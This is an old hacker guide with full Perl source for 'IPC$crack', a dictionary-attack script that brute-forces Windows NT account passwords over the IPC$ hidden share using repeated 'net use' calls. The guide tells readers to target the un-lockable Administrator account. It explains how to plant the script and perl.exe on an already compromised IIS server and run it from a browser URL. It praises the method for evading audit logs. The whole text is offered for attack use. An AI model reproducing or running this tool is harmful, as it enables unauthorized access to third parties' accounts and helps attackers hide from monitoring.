IPC$crack attempts to crack a user's password using a dictionary attack by connecting to the ipc$ hidden share on a NT machine and trying passwords read from a text file. I advise you to try the Adminstrator account because this can't be locked out . IPC$crack takes two command line parameters, namely the target machine and the account you want to crack. It can also be run remotely. If you have cracked an NT Internet Information Server upload ipc$crack.pl, perl.exe, a text file called net.txt (can c ontain anything) and that passwd.txt file to the \inetpub\scripts directory. To run it enter the following in your browser :

http://www.here.com/scripts/perl.exe?c:/inetpub/scripts/ipc$crack.pl%20target%20account

where "target" is the machine eg www.microsoft.com and "account" is the UserID that you're trying to crack eg Administrator. Here it is :

************************** CUT ********************************

#

# IPC$crack

# Created by Mnemonix 1st of May 1998

#

$victim = $ARGV[0];

$user = $ARGV[1];

open (OUTPUT, ">e:/inetpub/scripts/net.txt");

open (PASSWORD, "e:/inetpub/scripts/passwd.txt");

$passwd = <PASSWORD>;

while ($passwd ne "")

{

chop ($passwd);

$line = system ("net use \\\\$victim\\ipc\$ $passwd /user:$user");

if ($line eq "0")

{

print OUTPUT ("$user\'s password on $victim is $passwd.");

$passwd="";

}

else

{

$passwd = <PASSWORD>;

if ($passwd eq "")

{

print OUTPUT ("Not cracked.");

}

}

}

********************************** CUT *********************************

If the password is cracked it will be written to the file net.txt. If not then you'll get a message saying not cracked. IPC$crack is slower than Ftpcrack but there are less logs generated if any at all. More importantly if auditing is enabled, no IP addresses are logged.

Note - net.txt and passwd.txt must be in the location (path) specified by the script. You can edit the script to suit your own needs.